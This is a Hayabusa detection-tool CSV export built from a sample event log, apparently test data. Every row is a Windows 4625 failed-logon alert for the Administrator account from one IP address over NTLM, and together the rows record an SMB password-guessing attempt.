2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKKTTQ0ZT2Ye4TV9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LdBFYyftnH67Gyh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eO6c2PDl7zVBGzPi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ONnDOs16EnBkdFv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTHHCX9EoKRY4zhR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f1jhH08oLzpONDpa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o2YK7zc7Ne9c8txA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86CrOo9CFreIzSM5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0X9UEojEnc350xPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9g3PO3jofnySl92G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TRndfQmPYuhV0Ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yyJOdaks4B1sKMDv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IB3OSmcFx5TUiiJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lo3Ex40dkIeO53HF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkzDG8QOM2cxbokF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YoMf36ZXJBLnYxtc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5izPIefHqDDWNDlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z9o4f1XvvcVXBNwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IjCR48ZJFyEhzrYI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUV9i4O2gapcC01d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJzGAMQCvJBFOUPq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fyyu0x6I29R2J10Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8lCe1shqSs0xNwAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ipZAMvm56d5mE9Fc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XX9N7jodTuEYBCSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h5DBFGpzfJJ7gYV1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ3qTwcWkXJDuXDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOfkvLSo2HuhMtvk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y9DQUhPQHvvwAO0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yao1JM0tSFv5IHnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXGm63wiZz3ZYFb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: izvPgZCO2GRVLhId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iI9zO2o7jd922pfK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnAGy86My6hVwt4J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhFTzONSVEziRtgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdEv4ooC8AApqU1T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxFGRBKVK732Aeu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITg8QH90LKkAQMLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8YKCN2uxmJtYxdW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lcVIqrTQbNLFW7Cr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: taZx68l1ci0i2XB0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Jjy0gZhZCc9dVGd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S1DxOWcNytmxHfxl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGRFWos3MJeQ0oAr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I3YXVTiQAGbf57TH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eWNsBwoGd36krY2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HIobpWCoOHdD76lL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W91ruUEdXwRcMxVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6PEs7fp97cYFf4vx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQelUX0kwLfpJnr0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t88CBspQqbiO1IPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zELW2Upo3jRCIqJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfcyJGLYmu93JBIL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3t2nKPZHZvcXM3QA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oiDRonqdEM2YJvz9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wJPF4GUypkDkTz56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cd5YRVIoXx8LoYpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H49I2Xp2Gz1Jj0Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMSWWzskoRfYBGny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLm2PolKMBsYkPnN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZjHWhG2rXzYWskz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FOZzVedHYODB5Yvd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVaRybjI4HdZV0Zs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tTcl30MvvycjFcQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVZqbCr9EwmV4gNE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zVwhii0TVmCkpDI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Tx04CPPVa6WYY9G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gHyefIGqhIIy3ZI9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wrietoh4wgXcEvNd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9WW0Y5PW2JfCCdyR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmXsMJ0ELK4qiNY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeftUqriSoxCgmDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60JE9WQQ8N00j65B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0rt2yVAEH6V4IIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pay98C2Gr1di7qQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
